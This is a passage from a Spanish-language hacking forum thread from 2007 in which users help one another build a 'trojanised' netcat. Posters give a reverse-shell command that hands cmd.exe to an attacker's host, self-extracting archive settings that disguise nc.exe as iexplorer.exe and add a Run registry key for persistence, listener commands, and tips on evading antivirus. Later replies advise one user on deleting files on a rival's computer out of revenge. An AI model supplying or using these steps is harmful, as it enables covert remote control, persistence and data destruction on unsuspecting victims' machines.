y nada más, ya está...Si querés que se conecte a tu máquina siempre metés en el registro una entrada a un temporizador hecho en batch o lo que quieras...el resto es imaginación, ocultas las cosas, renombras y todo eso...Leete el post así no repetimos cosas que ya se dijeron :xD

Bye!


Título: Re: Jugando con netcat
Publicado por: @ron en 13 Agosto 2007, 23:42 pm
una ultima duda nc -d -e cmd.exe tu.dns 80 , eso puedo ponerlo en el regisro o solamente cuando abra netcat??

hoy intente hacer una shell usado el puerto 6000 pero no podia usar el comando dir lo unico q pasaba esq cuando escribia algo en nc aparesia en el de el y viceversa, tambien lo intente usando los puertos 25 y 80 y ocurria lo mismo, cual podria ser el problema??


Título: Re: Jugando con netcat
Publicado por: D4RIO en 14 Agosto 2007, 03:59 am
eso de nc -d -e cmd.exe tu.dns 80 especifica que la conexión es por el puerto 80, para que sea por el 6000 deberías cambiarlo.

No se si puedas ponerlo así en el registro, a parte no uso windows  :xD Pero podés poner una entrada en alguna rama de inicio que llame a un vbs que ejecute escondidito el comando del nc...o bien si no lo queres esconder pones en el registro la llamada a un batch.

Las posibilidades son muchísimas y te va a ser más provechoso "jugar" como dice yan...o sea...probá y probá! Yo hice un monton de pavadas con netcat, pero es cosa de sentarse y probar, tener un poco de imaginación y un montón de tiempo al cuete  ;D

Bueno, feliz hacking


Título: Re: Jugando con netcat
Publicado por: @ron en 14 Agosto 2007, 19:06 pm
D4RIO

ps gracias por la paciencia y la informacion usare mi imaginacion y aver q pasa y aversi logro poder poner en practica lo q se asta ahora.

saludos, e igual, feliz hacking!!


Título: Re: Jugando con netcat
Publicado por: culjar en 16 Agosto 2007, 18:35 pm
Buenas a todos!! soy  nuevo en el foro y me llama bastante la atencion esto de poder troyanizar el netcat, pero sin embargo tengo un problema, y es que no soy capaz de hacerlo funcionar.
El problema viene porque mi pc está tras una Lan controlada por un router wifi, de manera q cuando especifico mi IP en el netcat pongo la pública que me ofrece mi proveedor de internet y parece q este es el problema ya que si pongo la del localhost siq me funciona perfectamente.
Espero que me puedan ayudar...y no estaría nada mal saber como se utiliza el type como pone en la primera pagina del post  ;D

Un saludo a todos.


Título: Re: Jugando con netcat
Publicado por: @ron en 16 Agosto 2007, 19:01 pm
Buenas a todos!! soy  nuevo en el foro y me llama bastante la atencion esto de poder troyanizar el netcat, pero sin embargo tengo un problema, y es que no soy capaz de hacerlo funcionar.
El problema viene porque mi pc está tras una Lan controlada por un router wifi, de manera q cuando especifico mi IP en el netcat pongo la pública que me ofrece mi proveedor de internet y parece q este es el problema ya que si pongo la del localhost siq me funciona perfectamente.
Espero que me puedan ayudar...y no estaría nada mal saber como se utiliza el type como pone en la primera pagina del post  ;D

Un saludo a todos.

yo te recomiendo que mejor agas que se conecte a una direccion dns y asla con no-ip lee mas sobre no-ip y veras que te puede funcionar, asla pruba y dinos si te funciona!!


saludos!


Título: Re: Jugando con netcat
Publicado por: D4RIO en 16 Agosto 2007, 21:52 pm
Si el problema en éste caso es el router fijate cómo está configurado y si tenés los puertos que usas habilitados.

En el tema creo que ya se habló sobre eso.


Título: Re: Jugando con netcat
Publicado por: culjar en 17 Agosto 2007, 17:00 pm
Pues la cosa sigue sin funcionar. Lo de no-ip ya lo habia probado pero eso no tenia muxo q ver con el problema porque al fin y al cabo lo probe con la IP que me da mi ISP de internet que es mas o menos lo mismo.
En cuanto al router "creo" que tengo todo bien configurado y los puertos correspondientes abiertos aunque de todos modos uso el puerto 80 que se supone viene abierto por defecto.
No se me ocurre que mas hacer, asi que se admiten sugerencias de todo tipo.

Gracias de antemano!


Título: Re: Jugando con netcat
Publicado por: @ron en 17 Agosto 2007, 19:23 pm
creo q si pones el de ISP no se conecta a la pc esacta q tu quieres por eso te recomiendo q mejor la no-ip, si usas la de tu pc dentro de la lan el usar netcat para hacer una shell funcionara siempre y cuando lo intentes hacer dentro de la lan o wlan si lo q quiere es usarla fuera de tu red usa la no-ip o pon a la escucha y no en tu pc si no en la otra un minuto en el registro y as las modificaciones.


no se si me exlpique bien, y si no ps aqui estoy!!


Título: Re: Jugando con netcat
Publicado por: D4RIO en 17 Agosto 2007, 22:16 pm
Hola, el servicio de no-ip ees simplemente un proveedor de DNS y no es "mas o menos lo mismo" usar el DNS que el IP, es "EXACTAMENTE LO MISMO". Lo que pasa es que el servidor de DNS se encarga de "divulgar por toda internet" (por así decirlo), un nombre que cada vez que se use debe ser considerado como si fuera tal IP.

Si funciona en una LAN y no en la "Gran Red" debe ser porque la conexión está pasando por un firewall, que a veces es del lado del ISP o de la otra máquina.

Uno de los problemas de que toda la red esté hecha para Windows es que herramientas muy útiles como NetCat pasan a ser una "amenaza" para todos y hasta los ISP te la pueden joder. Cheká esas cosas porque la conexión está siendo interrumpida. Hacele Ping al host al que te querés conectar (o hacete uno desde ese host), y verifica las cosas. Hurgando seguro que te topas con el problema.


Título: Re: Jugando con netcat
Publicado por: .Undertaker. en 19 Agosto 2007, 15:45 pm
Alguien me puede pasar el link de descarga de este material¿?¿?

ResHacker.
k no sea enlace ed2k por favor jiji!


Título: Re: Jugando con netcat
Publicado por: .Undertaker. en 19 Agosto 2007, 23:14 pm
Ya m funciona perfectamente....pero para k se ejecute el comando tiene k se ejecute el comando tiene k ser asi...

cd "C:\windows"

no?¿?


Título: Re: Jugando con netcat
Publicado por: D4RIO en 19 Agosto 2007, 23:31 pm
NOP...precisamente c:\windows forma parte de la variable de sistema "PATH" y cuando escribis un comando en Windows se busca ese comando en cada directorio de la variable PATH y con cada extensión de la variable que creo que es PATH_EXT por lo que a menos que exista un nc.com podrás escribir solo "nc" y el sistema buscará y encontrará que te referís a "c:\windows\nc.exe".
Por eso es recomendable guardarlo ahi...o modificar PATH... ;D


Título: Re: Jugando con netcat
Publicado por: .Undertaker. en 20 Agosto 2007, 01:00 am
lo guarde en "C:\documents and settings\usuario xk es la ruta k se me inicia en cmd..asi ya no uso cd XDXD ;D ;D ;D


Título: Re: Jugando con netcat
Publicado por: .Undertaker. en 20 Agosto 2007, 03:02 am
Una pregunta...instale el netcat-troyanizado para ver si funcionaba en mi pc i m sale esto al final d todo:

(http://imagen.subeimagen.com/5291721.JPG)

...la verdad no se si funciona....

m lo podrian explicar?¿?

gracias d antemano i salu2!!





Título: Re: Jugando con netcat
Publicado por: platero49 en 20 Agosto 2007, 13:32 pm
Hola a todos, tengo un pequeño problema , intento enviar un e-mail con el netcat  y como servidor de SMTP, el minirelay Server 0.9.77.d , y no hay manera de conseguirlo,y sin embargo con el Outlook  y el minirelay  va a la primera, he probado cambiando en configuración del minirelay Server  autodetectar servidor DNS y tambien poniendo la  direccion IP del DNS , utilizo router y tiene abierto el puerto 25,  la IP  dinamica, y en la LAN mi IP es 192.168.1.33 y como puerta de enlace 192.168.1.1,  he probado desactivando el antivirus ( NOD32) y el firewall  ( Outpost ) aunque he habilitado permiso total para el netcat y el minirelay,  y el comando que pongo es el tipico: type mensaje.txt|nc –vv –w 3 127.0.0.1  25. Mirando lo que sale en la ventana del minirelay  y comparando  cuando hago el envio con Outlook y cuando lo hago con el netcat parece evidente que el problema esta en que no se conecta con el servidor DNS.  Ya me sale humo

CON  OUTLOOK
13:04:53 Escuchando en 127.0.0.1 (Puerto 25)
13:05:40 Comando: MAIL FROM <xxxx@terra.es>
13:05:40 Comando: RCPT TO <xxxx@terra.es>
13:05:40 [1] Dominio MX de terra.es cacheado
13:05:40 [1] Conectando con mx.terra.es
13:05:40 [1] Enviando mensaje
13:05:41 [1] Mensaje enviado correctamente


CON  NETCAT
12:30:16 Escuchando en 127.0.0.1 (Puerto 25)
12:30:51 Comando: MAIL FROM <xxxxx@terra.es>
12:30:51 Comando: RCPT TO <xxxxx @terra.es>

¿Algun alma caritativa me podria orientar?


Título: Re: Jugando con netcat
Publicado por: .Undertaker. en 20 Agosto 2007, 15:21 pm
Necesito k m ayuden.....

http://es.youtube.com/watch?v=2GfKXVgkSpU

ayudenme por favor!


Título: Re: Jugando con netcat
Publicado por: .Undertaker. en 20 Agosto 2007, 15:32 pm
aora ya lo ice todo:

Código:
Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\owner>nc -vv -L -p 80
listening on [any] 80 ...
Warning: forward host lookup failed for windows-775i945.mundo-R.com: h_errno 110
04: NO_DATA
connect to [83.165.81.162] from windows-775i945.mundo-R.com [83.165.81.162] 2287
: NO_DATA
Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\owner\update>

No funciona no???


Título: Re: Jugando con netcat
Publicado por: Unnamed en 28 Agosto 2007, 03:09 am
Podrias explikar komo instalarle el RealVnc4 ala victima?  ;D


Título: Re: Jugando con netcat
Publicado por: beider en 28 Agosto 2007, 11:35 am
ola soi nuevo en esto de hackear y eso me gustaria que algien me informara sobre que es el netcat para que sirve y como puedo consegirlo y si fuera posible me gustaria que algien me enseñara a ser hacker de forma personal mediante e-mails aqui os dejo mi crreo por si algien me puede ayudar rodrigo_elchivi@hotmail.com


Título: Re: Jugando con netcat
Publicado por: WannaBeHacker en 28 Agosto 2007, 13:16 pm
ola soi nuevo en esto de hackear y eso me gustaria que algien me informara sobre que es el netcat para que sirve y como puedo consegirlo y si fuera posible me gustaria que algien me enseñara a ser hacker de forma personal mediante e-mails aqui os dejo mi crreo por si algien me puede ayudar rodrigo_elchivi@hotmail.com

Hahahah diiiossssssss que buenoooo
jajaja esto para humor amarillo!!!
JAjaja todavia sigo riendome XDDDDDDDDDDDDDDDDDDDDDDDD


Título: Re: Jugando con netcat
Publicado por: .Undertaker. en 28 Agosto 2007, 15:27 pm
JajaJJAjajajajJJAJAJjajajajJJJAJAjaja
>esto tmb va para youtube! XDXD


Título: Re: Jugando con netcat
Publicado por: .Undertaker. en 28 Agosto 2007, 18:08 pm
Por favor necesito k alguien k aya "creado" el netcat troyanizado m ayude a acer uno..xk no m acaba d funcionar i llevo 4 dias intentandolo....Si puede ser k m de su MSN por M.P

>Salu2! y gracias de todas formas


Título: Re: Jugando con netcat
Publicado por: neoxz en 29 Agosto 2007, 21:29 pm
muy bien explicado  :D


Título: Re: Jugando con netcat
Publicado por: crow666 en 30 Agosto 2007, 02:08 am
ya no tengo ningun error pero mi duda es despues de esto que se hace digo para poder subir las cosas alguien me explica?


Título: Re: Jugando con netcat
Publicado por: Unnamed en 30 Agosto 2007, 20:49 pm
ya no tengo ningun error pero mi duda es despues de esto que se hace digo para poder subir las cosas alguien me explica?

no entendi tu pregunta. te referis a pasarle archivos a la victima?

PD: por las dudas visita la web del autor de este tutorial  ;D

http://whk.sitehacking.net/

Anda a la sección de descargas y encontraras videos


Título: Re: Jugando con netcat
Publicado por: Lewert en 30 Agosto 2007, 22:48 pm
Apesar de haberle pasado el Themida, en la pagina de www.virustotal.com me sale que el Kaspersky y el NOD32 (los dos AV's mas utilizados) lo reconocen como hacking tool, tambien el Panda lo reconoze. Lo raro es que tengo el NOD32 y no me salta el AV al ejecutarlo, no se que pasará.. =S
Alguien sabe si es verdad que es reconozido por muchos AV's? Si es asi.. me jodieron bastante  :-\


Título: Re: Jugando con netcat
Publicado por: D4RIO en 31 Agosto 2007, 05:47 am
Si, es verdad...pero ahi entra en juego tu habilidad como hacker para ocultarselo...


Título: Re: Jugando con netcat
Publicado por: DannyBoy en 3 Septiembre 2007, 20:34 pm
Hola gente, tengo problemas al utilizar el NetCat como cliente ftp tengo una cuenta en ftp.espacio.ya.com asi que para conectarme utilizo el comando
type ftp.txt|nc -vv -w 3 ftp.espacio.ya.com 21
el contenido de ftp.exe es algo asi:
user user
pass pass
syst
rest 100
rest 0
pwd
Type A
Pasv
stor nuevo.txt
retr fastscsi.dll
quit
el nc se conecta bien pero cuando llega a la orden de retr fastscsi.dll me dice permission denied tambien probe cambiando la orden retr fastscsi.dll c:\fastscsi.dll y me dice no such file or directory

Por que sera aaa tambien en la orden stor nuevo.txt (la puse para probar si podia subir algo)pone error permission denied

Porque sera alguien sabe?????
Que estoy haciendo mal???

Gracias comunidad


Título: Re: Jugando con netcat
Publicado por: Vraneth en 11 Septiembre 2007, 22:18 pm
[EDITADO]

Problema arreglado, yo y mi estupidez :P


Título: Re: Jugando con netcat
Publicado por: @ron en 11 Septiembre 2007, 23:23 pm
[EDITADO]

Problema arreglado, yo y mi estupidez :P

y como solucionastes ese problema, me imagino q el problema era en donde ponias el netcat o cual era el problema??


Título: Re: Jugando con netcat
Publicado por: crackneos en 12 Septiembre 2007, 00:47 am
Buenas alguien sabe como hacer un bat para mandar cierta cantidad de correos es decir mandar mas de 1.

helo localhost
mail from: tucorreo@hotmail.com
rcpt to: el_otro_correo@hotmail.com
data
subject: JEJEJE
MENSAJE
.
quit
 con ese codigo gracias a WHK con sus tutos sobre netcat de verdad no se como comenzar si alguien sabe que me ayude por favor. gracias. :o


Título: Re: Jugando con netcat
Publicado por: Vraneth en 12 Septiembre 2007, 01:04 am
[EDITADO]

Problema arreglado, yo y mi estupidez :P

y como solucionastes ese problema, me imagino q el problema era en donde ponias el netcat o cual era el problema??
Me aparecia algo como: "nc" no se reconoce como un comando interno o externo... Tuve que poner el nc.exe en C:\Windows y luego tuve que escribir cd c:\windows.

AHORA tengo otro problema, al escribir type mensaje.txt|nc -vv -w 3 127.0.0.1 25 me dice lo siguiente:
localhost [127.0.0.1] 25 (smtp):connection refused


Título: Re: Jugando con netcat
Publicado por: crackneos en 12 Septiembre 2007, 02:03 am
[EDITADO]

Problema arreglado, yo y mi estupidez :P

y como solucionastes ese problema, me imagino q el problema era en donde ponias el netcat o cual era el problema??
Me aparecia algo como: "nc" no se reconoce como un comando interno o externo... Tuve que poner el nc.exe en C:\Windows y luego tuve que escribir cd c:\windows.

AHORA tengo otro problema, al escribir type mensaje.txt|nc -vv -w 3 127.0.0.1 25 me dice lo siguiente:
localhost [127.0.0.1] 25 (smtp):connection refused


1-Hola tienes q colocar el netcat en la ruta path "c:\windows\system32 asi se añade como un comando.

2-estas mandando el mensaje al MiniRelay pero mejor te recomiendo encuentres un smtp asi podras mandar los mail´s asi hago yo.

type mensaje.txt|nc -vv -w 3 tu_smtp 25 busca en estas 18 paginas y veras la respuesta q postio un compañero. gracias.


Título: Re: Jugando con netcat
Publicado por: @ron en 12 Septiembre 2007, 02:59 am
[EDITADO]

Problema arreglado, yo y mi estupidez :P

y como solucionastes ese problema, me imagino q el problema era en donde ponias el netcat o cual era el problema??
Me aparecia algo como: "nc" no se reconoce como un comando interno o externo... Tuve que poner el nc.exe en C:\Windows y luego tuve que escribir cd c:\windows.

AHORA tengo otro problema, al escribir type mensaje.txt|nc -vv -w 3 127.0.0.1 25 me dice lo siguiente:
localhost [127.0.0.1] 25 (smtp):connection refused

yo e usado en minerelay y a mi si me a funcionado, cuando escribes todo en el bloc de notas ya revisastes si lo escribistes bien.??


Título: Re: Jugando con netcat
Publicado por: crackneos en 12 Septiembre 2007, 15:06 pm
[EDITADO]

Problema arreglado, yo y mi estupidez :P

y como solucionastes ese problema, me imagino q el problema era en donde ponias el netcat o cual era el problema??
Me aparecia algo como: "nc" no se reconoce como un comando interno o externo... Tuve que poner el nc.exe en C:\Windows y luego tuve que escribir cd c:\windows.

AHORA tengo otro problema, al escribir type mensaje.txt|nc -vv -w 3 127.0.0.1 25 me dice lo siguiente:
localhost [127.0.0.1] 25 (smtp):connection refused

yo e usado en minerelay y a mi si me a funcionado, cuando escribes todo en el bloc de notas ya revisastes si lo escribistes bien.??

Hola yo usando el minirelay no puedo mandar mail´s esto es lo q sale
type mensaje.txt|nc -vv -w 3 127.0.0.1 25

DNS fwd/rev mismatch: localhost != carlos
localhost [127.0.0.1] 25 (smtp) open
220 miniRelay Server v0.9.77d ready
250 Hello localhost
250 tucorreo@HOTMAIL.COM Address Okay
250 tucorreo@HOTMAIL.COM Address Okay
354 Start mail input; end with <CRLF>.<CRLF>
250 Ok
221 Signing Off
sent 121, rcvd 207: NOTSOCK


Título: Re: Jugando con netcat
Publicado por: Chupe! en 15 Septiembre 2007, 02:24 am
(http://img520.imageshack.us/img520/5268/acu46etmpft9.jpg)


y este error?


Título: Re: Jugando con netcat
Publicado por: WHK en 16 Septiembre 2007, 22:25 pm
(http://img520.imageshack.us/img520/5268/acu46etmpft9.jpg)
y este error?

Recuerda que tu netcat deve llamarse iexplorer.exe no internet explorer.exe... si ves bien en el winrar se ve iexplorer y estas tratando de ejecutar iexplorer.... cambiale el nombre al ejecutable y listo.


Título: Re: Jugando con netcat
Publicado por: Chupe! en 16 Septiembre 2007, 22:34 pm
ya cambie el nombre y me sigue apareciendo lo mimo :(


Título: Re: Jugando con netcat
Publicado por: WHK en 16 Septiembre 2007, 22:36 pm
cuelgalo en rapidshare para poder bajarlo o en megaupload... asi veré en que está fallando.


Título: Re: Jugando con netcat
Publicado por: Chupe! en 16 Septiembre 2007, 22:53 pm
http://rapidshare.com/files/56198011/iexplorer.rar.html

bueno lo unico que toque (cambie) fue lo de mi ip , ya que si no aparece en el registro..

fijate porfavor si lo demas esta bien ... muchas gracias por molestarte :xD


Título: Re: Jugando con netcat
Publicado por: WHK en 17 Septiembre 2007, 00:31 am
(http://img261.imageshack.us/img261/7633/dibujodg6.jpg)

Si te fijas estas intentando ejecutar iexplorer.exe cuando tienes puesto el nombre nc.exe, por eso no te lo encuentra. Cambiale el nombre y ponle iexplorer.exe al netcat.


Título: Re: Jugando con netcat
Publicado por: WHK en 17 Septiembre 2007, 01:26 am
He añadido en la primera página las preguntas y respuestas mas frecuentes.

http://foro.elhacker.net/index.php/topic,159799.0.html


Título: Re: Jugando con netcat
Publicado por: Chupe! en 18 Septiembre 2007, 01:34 am
una pregunta, cuando pongo nc -vv -L -p 80 se me abre rapidamente una ventana de ms dos y luego se me cierra..  :xD que puede estar pasando?? :¬¬ xD


Título: Re: Jugando con netcat
Publicado por: WHK en 19 Septiembre 2007, 00:34 am
talves vas a inicio ejecutar y escribes eso.... trata de ejecutar "CMD" y dentro de esa ventanita escribes nc -vv -L -p 80 y si te dice que el comando no existe y bla bla bla es porque tienes que poner tu netcat en C:\windows o c:\windows system32 para mayor comodidad. también puedes arrastrar el programa del netcat hasta dentro de la ventana del dos y despues escribes un espacio en blanco mas -vv -L -p 80


Título: Re: Jugando con netcat
Publicado por: Chupe! en 19 Septiembre 2007, 03:01 am
si ya lo se, seria algo raro ejecutar algo que no exista ;D, ya lo puse pero ni idea se me abre la ventana del cmd y luego se me cierra cuando lo pongo .. alguna sugerencia xD :xD

saludos!


Título: Re: Jugando con netcat
Publicado por: lupino666 en 23 Septiembre 2007, 21:29 pm
Saludos

exelnte manual muy bueno

pero el problemas es que mi ip cambia cada tanto y asi no puedo conseguir la shell inversa, como podira consegui la shell inversa aunque mi ip cambie

gracias por su ayuda


Título: Re: Jugando con netcat
Publicado por: WannaBeHacker en 23 Septiembre 2007, 21:30 pm
Saludos

exelnte manual muy bueno

pero el problemas es que mi ip cambia cada tanto y asi no puedo conseguir la shell inversa, como podira consegui la shell inversa aunque mi ip cambie

gracias por su ayuda

Busca información a cerca de no-ip ;)


Título: Re: Jugando con netcat
Publicado por: WHK en 23 Septiembre 2007, 22:01 pm
Citar
pero el problemas es que mi ip cambia cada tanto y asi no puedo conseguir la shell inversa, como podira consegui la shell inversa aunque mi ip cambie
Citar
Busca información a cerca de no-ip wink

NO-IP te banea las cuentas por hacer eso y pierdes tus shells... en jugando con cryptcat II explico como reemplazar NO-IP con unos simples comandos sin depender de nadie, saldrá en la tercera ezine de isirius Insecurity (http://www.ezine-insecurity.com/), después que salga lo publicaré.

Chupe, prueva deshabilitando tu antivirus  :P


Título: Re: Jugando con netcat
Publicado por: Unnamed en 24 Septiembre 2007, 02:00 am
todas las veces que hice el troyano con el netcat no hubo problemas pero ahora surgen errores  :¬¬

(http://img222.imageshack.us/img222/4073/dibujoqz1.jpg) (http://imageshack.us)



Las rutas son :

Path=%homedrive%%homepath%\update
SavePath
Setup=iexplorer.exe -d -e cmd.exe mi_ip 80
Presetup=%windir%\system32\cmd /c reg add HKcU\Software\Microsoft\Windows\CurrentVersion\Run /v "iexplorer" /t REG_SZ /d "%homedrive%%homepath%\update\iexplorer.exe -d -e cmd.exe mi_ip 80" /f > nul
Silent=1
Overwrite=2


Cual seria el error? eh probado de diferentes modos y ahora no logro crearlo



Título: Re: Jugando con netcat
Publicado por: WHK en 24 Septiembre 2007, 04:47 am
Yo lo veo bién... no te conecta o que?


Título: Re: Jugando con netcat
Publicado por: Unnamed en 25 Septiembre 2007, 16:35 pm
Problema resuelto  ;D
Me decia que windows no entradaba el archivo iexplorer.exe.
El problema fue que me cambiaron la version de nc  en mi ordenador sin consultarmelo ;D
Pido disculpas :-[


Título: Re: Jugando con netcat
Publicado por: noir_Angel en 26 Septiembre 2007, 17:27 pm
tengo un par de dudas... aun soy un newbie y al intentar hacer todo lo que dices dentro de una red lan, no puedo conectar al oredenador victima, como puedo solucionar ese problema??.. como info adicional la red está creada con un router linksys y son direcciones del tipo 192.168.*.*

y dos, el sistema de no-ip funciona igual o muy parecido al de dyndns?? o son muy diferentes??


Título: Re: Jugando con netcat
Publicado por: WHK en 27 Septiembre 2007, 21:17 pm
Por lo que estuve mirando dyndns funciona de la misma manera que no-ip y ojo que este tipo de servicios no te funcionará dentro de una red local ya que necesitarías poner a escucha el netcat hacia internet y eso significa abrir puertos en tu router.


Título: Re: Jugando con netcat
Publicado por: crow666 en 27 Septiembre 2007, 21:59 pm
tengo una duda :

digamos que la persona cae la primera ves listo le da doble clik al archivo y ingreso a su pc pero si quiero al otro dia volver a entrar le doy nc -vv -L -p 80 y no entra se queda esperando,

¿es obligatorio para poder entrar que le este dando dos clik?
o si hay alguna forma de entrar ya una ves esa cosa dentro y como se escribe


Título: Re: Jugando con netcat
Publicado por: lupino666 en 27 Septiembre 2007, 23:34 pm
lo que hace el troyanito es agregarse al registro osea que se iniciara cuando se prende el equipo
y cuando se prenda el equipo el troyano intentara conectarse al puerto que se especifico ( 80 ) y si no estaba en eschucha pues se jodio pero si estaba en escucha se conecta y tienes la shell asi que lo que hay que hacer es digaños tu prendes tu PC y ejecutas nc -vv -L -p 80 y lo dejas ay y cuando el otro prende su PC se conectara con tigo y tendras la shell


Título: Re: Jugando con netcat
Publicado por: crow666 en 27 Septiembre 2007, 23:39 pm
bueno y digamos que ya toy dentro yo quiero hacer un ajuste de cuentas como dijo el man y dañarle la pc osea borrarle todo todo que ago?


Título: Re: Jugando con netcat
Publicado por: lupino666 en 28 Septiembre 2007, 00:29 am
para vengarte podrias

 moverte por todo el disco y borrando lo qeu se te de la gana
o le subes un virus o toryano o lo que sea
o joder la vida abriendole paginas XXX
(esa se la ise a un amigo  ::) )


Título: Re: Jugando con netcat
Publicado por: crow666 en 28 Septiembre 2007, 00:33 am
tu se la hiciste un amigo yo le ago a un hp que me trato de robar a mi novia y la insulto porque no se quiso ir con el, ademas de ser un perro malnacido pls ayudame a saber como borrarle


Título: Re: Jugando con netcat
Publicado por: D4RIO en 28 Septiembre 2007, 00:41 am
Aprendiendo a usar los comandos, como "del", o usando un Batch con algun bucle...de todas formas hacer esas gansadas es cosa de lammers, sea por lo que sea, esa actitud de pedir ayuda para joderle la vida a alguien es poco "pro"  :xD

O sea, si queres hacer una venganza infantil anda a la casa y tirale huevos  ;D


Título: Re: Jugando con netcat
Publicado por: crow666 en 28 Septiembre 2007, 00:57 am
pero... necesito ayuda po y no es niñeria tu no pasas por lo que e pasado yo para venir a criticarme vale? primero siente despues critica y no soy pro aun nop, no todos somos como tu si?

que comando puedo usar? pls ayudenme ó.ò


Título: Re: Jugando con netcat
Publicado por: lupino666 en 29 Septiembre 2007, 00:06 am
del <archivo>



Título: Re: Jugando con netcat
Publicado por: txuben en 29 Septiembre 2007, 00:21 am
pero... necesito ayuda po y no es niñeria tu no pasas por lo que e pasado yo para venir a criticarme vale? primero siente despues critica y no soy pro aun nop, no todos somos como tu si?

que comando puedo usar? pls ayudenme ó.ò

Antes de correr, aprende a andar: comandos ms-dos (http://www.ayuda-internet.net/tutoriales/manu-msdos/manu-msdos.html)


Título: Re: Jugando con netcat
Publicado por: crow666 en 29 Septiembre 2007, 20:39 pm
sip eso me lo se pero es que nu logro borrarselos poque sale acceso denegado T.T intente con del, erase y nada


Título: Re: Jugando con netcat
Publicado por: txuben en 29 Septiembre 2007, 20:55 pm
sip eso me lo se pero es que nu logro borrarselos poque sale acceso denegado T.T intente con del, erase y nada

El que quieres borrar? si te sale acceso denegado seguramente es porque ya esta en uso,podrias terminar el proceso con tskill/taskkill y luego proceder a eliminar  ;)


Título: Re: Jugando con netcat
Publicado por: Chupe! en 30 Septiembre 2007, 00:44 am
ahora me tira el error de win32, estoy buscando por el netcat v 1.0 , si encuentran una pagina "confiable" de donde bajarlo... estaría agradecido.. yo ahora busco  ;D


Título: Re: Jugando con netcat
Publicado por: txuben en 30 Septiembre 2007, 13:02 pm
Descarga Netcat (http://www.freewebtown.com/txubenn/netcat.rar)


Título: Re: Jugando con netcat
Publicado por: WHK en 30 Septiembre 2007, 13:10 pm
Lo adjunté al primer post para que ya no haya mas problemas de buscarlo.
Se ve en la parte de abajo el primer post (solamente las personas registradas pueden ver el archivo).


Título: Re: Jugando con netcat
Publicado por: Mc_Roy en 4 Octubre 2007, 03:05 am
habria alguna manera de reestablecer las imagenes del primer post??

porque por ejemplo, no se ve la imagen que explica como crear el 'cliente' para que el netcat troyano se comunique conmigo.

Muchas gracias, por lo demas, muy bien explicado


Título: Re: Jugando con netcat
Publicado por: Unnamed en 4 Octubre 2007, 20:08 pm
habria alguna manera de reestablecer las imagenes del primer post??

porque por ejemplo, no se ve la imagen que explica como crear el 'cliente' para que el netcat troyano se comunique conmigo.

Muchas gracias, por lo demas, muy bien explicado

Por el momento las images del post no pueden ser visualizadas debido a problemas con la web de WHK


Título: Re: Jugando con netcat
Publicado por: Mc_Roy en 4 Octubre 2007, 20:33 pm
Pero es algo temporal no???

De todas formas, si me podeis decir el codigo que hay que poner para crear el 'cliente' para que el troyano creado con netcat se comunique conmigo. (En la Parte I, despues del punto 5.)

Gracias


Título: Re: Jugando con netcat
Publicado por: Unnamed en 4 Octubre 2007, 21:24 pm
Pero es algo temporal no???

De todas formas, si me podeis decir el codigo que hay que poner para crear el 'cliente' para que el troyano creado con netcat se comunique conmigo. (En la Parte I, despues del punto 5.)

Gracias

por supuesto  ;D

Desde el menu de opciones avanzadas de sfx, eliges la pestaña texto e icono y desde cargar "SFX icono desde" eliges el icono final en cual quieres disfrazar el netcat

(http://img129.imageshack.us/img129/8817/60707771pb5.jpg)



Título: Re: Jugando con netcat
Publicado por: Mc_Roy en 4 Octubre 2007, 23:12 pm
Gracias, pero me referia un poco mas adelante :P

Citar
Ahora vamos a crear el programa que nos conectará con la victima, y se llama “Cliente”
Solo ejecutamos esto y estaremos listos para recibir la conexión de quien abra la carnada:

Justo lo que va despues de eso es lo que necesito :P

Gracias de nuevo!


Título: Re: Jugando con netcat
Publicado por: Unnamed en 5 Octubre 2007, 01:50 am
Gracias, pero me referia un poco mas adelante :P

Citar
Ahora vamos a crear el programa que nos conectará con la victima, y se llama “Cliente”
Solo ejecutamos esto y estaremos listos para recibir la conexión de quien abra la carnada:

Justo lo que va despues de eso es lo que necesito :P

Gracias de nuevo!


mis disculpas
Desde el cmd tienes que tipear nc -vv -L -p 80
Eso dejara el puerto 80 en escucha hasta que la victima y se establezca la conexion

Perdon no estoy desde mi pc y no puedo explicartelo con imagenes




Título: Re: Jugando con netcat
Publicado por: Bonfire en 5 Octubre 2007, 02:27 am
hay algo que no termino de entender, y lo siento pero leerme 20 paginas de posts no puedo... es decir, el propio archivo nc.exe, ejerce como cliente y servidor?
Por lo que yo entiendo visto el proceso, es que en ese caso el programa que se ponga dentro del rar da igual, porque la orden de ejecutar la consola y añadir al registro van con el ejecutable nuevo. Me equivoco?

Saludos


Título: Re: Jugando con netcat
Publicado por: WHK en 5 Octubre 2007, 03:33 am
Exacto... nc.exe sirve tanto de servidor como cliente del mismo.


Título: Re: Jugando con netcat
Publicado por: Mc_Roy en 5 Octubre 2007, 04:13 am
mis disculpas
Desde el cmd tienes que tipear nc -vv -L -p 80
Eso dejara el puerto 80 en escucha hasta que la victima y se establezca la conexion

Perdon no estoy desde mi pc y no puedo explicartelo con imagenes


Gracias por el interes. Al ejecutar el nc.exe y tipear 'nc -vv -L -p 80' se me cierra la shell sin dar aviso alguno....
hay que abrir el puerto 80 del router??

Gracias de nuevo

EDITO: Vale, si lo ejecuto desde Inicio->Ejecutar->cmd... si que funciona, aparece:

'listening on [any] 80...'


Título: Re: Jugando con netcat
Publicado por: .Undertaker. en 6 Octubre 2007, 13:14 pm
mis disculpas
Desde el cmd tienes que tipear nc -vv -L -p 80
Eso dejara el puerto 80 en escucha hasta que la victima y se establezca la conexion

Perdon no estoy desde mi pc y no puedo explicartelo con imagenes


Gracias por el interes. Al ejecutar el nc.exe y tipear 'nc -vv -L -p 80' se me cierra la shell sin dar aviso alguno....
hay que abrir el puerto 80 del router??

Gracias de nuevo

EDITO: Vale, si lo ejecuto desde Inicio->Ejecutar->cmd... si que funciona, aparece:

'listening on [any] 80...'

Mejor abre el puerto 80...Le abriste el de la victima?? y le bloqueaste el firewall...tmb sacaste el tuyo?

 ;D


Título: Re: Jugando con netcat
Publicado por: soft en 14 Octubre 2007, 22:05 pm
al conectarme con netcat a otra pc me salen simbolos no legibles o si no demora un chorro en conectarse ? a que se debo seo tal vez al router?


Título: Re: Jugando con netcat
Publicado por: TheBenjoO en 15 Octubre 2007, 00:13 am
mm no termino de entender q nombre le tengo q poner a esto?

@echo off
if not exist ips.txt (goto 1) else goto 2

:1
Echo ips.txt no existe sad
Echo.
pause
exit

:2
